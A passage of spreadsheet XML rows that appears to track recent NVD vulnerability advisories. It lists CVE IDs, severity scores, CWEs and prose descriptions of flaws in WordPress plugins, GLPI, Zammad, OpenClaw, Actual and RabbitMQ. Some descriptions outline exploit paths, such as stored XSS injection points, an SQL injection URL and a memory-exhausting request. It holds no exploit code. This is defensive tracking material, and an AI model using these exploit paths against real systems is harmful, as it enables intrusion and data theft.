      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>The User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Avatar Field in all versions up to, and including, 4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The zero-length multipart file branch in wppb_save_avatar_value() writes the raw request value directly to user meta, bypassing the wppb_save_attachment_id()/wppb_verify_attachment_id() validation path; the stored payload is later adopted as a WordPress attachment URL and rendered unescaped by wppb_default_fields_make_upload_button() when an administrator views the affected account.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95866</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96039</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>The BA Book Everything plugin for WordPress is vulnerable to Stored Cross-Site Scripting via first_name Parameter in all versions up to, and including, 1.8.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. An unauthenticated attacker can obtain the valid order_id, order_num, and order_hash credentials required to reach the vulnerable action_to_pay() handler simply by placing a guest booking through the public [babe-booking-form] shortcode, making the full exploit chain reachable without any account.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96039</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96568</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>The Restaurant Menu and Food Ordering plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'phone_number' parameter in all versions up to, and including, 2.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96568</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96752</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>The Zero Spam for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Nested POST Array Keys via Contact Form 7 Integration in all versions up to, and including, 5.7.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The payload is delivered by submitting a Contact Form 7 request with a nested POST array key containing arbitrary HTML or JavaScript — PHP parses the field name into a nested array key, which is stored verbatim in the zerospam_log.submission_data column when Zero Spam flags the submission as spam due to the absence of the zerospam_david_walsh_key field.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96752</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97060</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 lacks object-level authorization in user management endpoints, allowing sub-administrators to modify or delete users without ownership verification. Attackers with user-management permissions can reset passwords for any account including the super administrator, rebind roles, or delete users via POST /sys/user/update and POST /sys/user/delete endpoints.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97060</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100555</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed gateway application. In versions &gt;= 2026.7.1 and &lt; 2026.8.1, Synology Chat attachment delivery could lose DNS pinning: the Gateway validated a single DNS result for a supplied file URL but then passed the original hostname to the Synology NAS, where it could resolve to a different destination. When attachment delivery accepted a remotely influenced hostname, an attacker could use DNS rebinding to make the NAS fetch a private or otherwise policy-denied resource and return its contents to the addressed conversation (server-side request forgery). Practical impact depends on NAS routing, resolver behavior, and the response available at the private destination. The issue is fixed in 2026.8.1; as a workaround, disable remote URL attachment forwarding in Synology Chat.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100555</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100598</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>npm, react</t>
        </is>
      </c>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package openclaw) before 2026.7.1 incorrectly binds Signal approval reactions. In affected versions, a reaction intended to resolve a structured approval request could instead attach to ordinary outbound text when unrelated outbound messages and a pending approval are present in the same conversation. As a result, an approver's reaction to unrelated text could be interpreted as approving or denying a pending host action; the practical impact depends on the pending request, conversation timing, and the actions available to the OpenClaw process. The issue does not change the authority of correctly identified approvers. This is fixed in version 2026.7.1.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100598</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53626</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.5 until 11.0.8, under certain conditions, permission logic can grant access to a document without confirming that the document is linked to the targeted item. A user can use an unrelated item that the user is permitted to view to read a document linked to an inaccessible item. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53626</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53629</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 9.4.0 until 10.0.26 and 11.0.8, an attacker with the READ right on logs can craft a URL for the history tab that injects attacker-controlled values into a database query. This permits SQL injection through the history tab endpoint. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53629</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56723</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, a customer who can view a ticket cannot see internal ticket articles through the article listing API. However, the same customer can directly request an attachment belonging to an internal article via the attachment download endpoint, bypassing article-level authorization. This results in an inconsistency: The article listing hides internal articles from customers. The attachment download only checks the parent ticket, not the article, so the same customer can download the attachment directly. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56723</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56724</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, summary An issue with permission checks in the knowledge base management area has been identified. Under certain conditions, data validation for linked items was not fully enforced. This could have allowed users with limited read permissions to interact with items outside their assigned access scope. Data access has been strengthened in the current version through additional validation routines. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56724</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56727</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-347, CWE-391</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, summary In Zammad's inbound PGP email processing, the return value of the gpg verification call was silently discarded. Regardless of whether gpg reported a valid, invalid, or missing signature, the handler unconditionally wrote sign: { success: true, comment: "Good signature" } to the article's security preferences. Impact Any sender could tamper with the body of a multipart/signed PGP email, or craft a message with an entirely fabricated or mismatched signature, and Zammad would display it to the recipient as cryptographically verified with a "Good signature" label. Users and agents relying on Zammad's signature indicator to confirm message authenticity and integrity would be misled into trusting modified or forged content. The vulnerability affects all inbound PGP-signed emails processed while the PGP integration is enabled. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56727</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57449</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr">
        <is>
          <t>github, requests, gin</t>
        </is>
      </c>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284, CWE-863</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>Actual is a local-first personal finance tool. Prior to 26.7.0, Actual Sync Server's CORS proxy is intended to let authenticated users fetch resources only from repositories listed in the official plugin allowlist. When `ACTUAL_GITHUB_TOKEN` is configured, the proxy automatically attaches the server's GitHub token to GitHub requests. The GitHub API allowlist check uses a raw `startsWith()` prefix test for `/repos/{owner}/{repo}` without requiring a path boundary after the repository name. If an allowlisted public plugin repository is `https://github.com/acme/plugin`, the proxy also accepts GitHub API URLs. Those URLs are outside the allowlisted repository but still pass because their API path starts with `/repos/acme/plugin`. The proxy then forwards the request with the server's `ACTUAL_GITHUB_TOKEN`, allowing any authenticated Actual user to read private GitHub resources reachable by that token. Version 26.7.0 fixes the issue.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57449</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67408</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>docker, requests, gin</t>
        </is>
      </c>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.1.0 until 4.3.3, 4.2.9, and 4.1.11, Stream Management Super-Stream Binding Keys Allocation Allows Low-Privilege Node Denial of Service. rabbitMQ 4.3.1 with rabbitmqstreammanagement enabled accepts PUT /api/stream/super-streams/{vhost}/{name} requests from an authenticated management user that can access the target vhost. When the request body contains the binding-keys field, the handler parses the attacker-controlled comma-separated string and builds the full stream-name list before checking whether the user has permission to configure the resulting streams. A low-privileged management user with vhost access but no configure, write, or read permission can therefore force large transient allocations before the resource permission check. In a 768 MB memory-limited container, one HTTP PUT with about 4.5 MB of JSON body killed the RabbitMQ container with Docker state exited true An authenticated low-privileged management user can kill a memory-limited RabbitMQ node with one HTTP This issue is fixed in versions 4.3.3, 4.2.9, and 4.1.11.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67408</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67419</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-407</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
